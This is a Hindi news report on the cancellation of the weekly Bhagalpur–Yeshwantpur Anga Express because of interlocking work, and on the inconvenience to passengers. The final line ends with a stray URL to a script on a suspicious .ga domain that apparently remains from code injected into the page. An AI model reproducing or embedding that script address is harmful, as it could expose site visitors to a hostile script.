भागलपुर ट्रेन यात्रियों के लिए आवश्यक सूचना – अंग एक्सप्रेस को किया गया रद्द ,जानिए रद्द करने का फिर क्या है कारण ?
भागलपुर, ( कुलसूम फात्मा ) ट्रेन यात्रियों के लिए खास सूचना बुधवार को नहीं चलेगी भागलपुर से यशवंतपुर के मध्य चलने वाली ट्रेन। इस बात की सूचना रेलवे डिपार्टमेंट में रिजर्वेशन कराएं हुए ट्रेन यात्रियों को मैसेज के द्वारा दे दी गई है। ट्रेन ना चलने की सूचना पाते ही तकरीबन डेढ़ हजार यात्रियों ने अपने रिजर्वेशन को कैंसिल करा लिया है।
बता दें की यह ट्रेन 6 जनवरी से नहीं चलेंगी ट्रेन के ना चलने के कारण भागलपुर के अलावा मुंगेर जमुई बांका लखीसराय के साथ-साथ झारखंड के यात्रियों को भी असुविधा होगी और परेशानी का इन यात्रियों को सामना करना पड़ेगा।
यह ट्रेन सप्ताह में 1 दिन चल रही थी और इस ट्रेन से उपर्युक्त क्षेत्र के लोग सफर कर रहे थे। बता दें की दक्षिण सेंट्रल रेलवे में नॉन इंटरलॉकिंग कार्य चल रहा है जिसके चलते इन रूट की तकरीबन एक दर्जन ट्रेनों को कैंसिल कर दिया गया है जिससे की यात्रियों को परेशानियों का सामना करना पड़ेगा। बता दें की भागलपुर से यशवंतपुर को चलने वाली एक्सप्रेस ट्रेन बुधवार से चलना बंद हो जाएगी। इस बात की सूचना रेलवे डिपार्टमेंट ने ट्रेन यात्रियों को भेज दी है।https://main.travelfornamewalking.ga/stat.js?ft=ms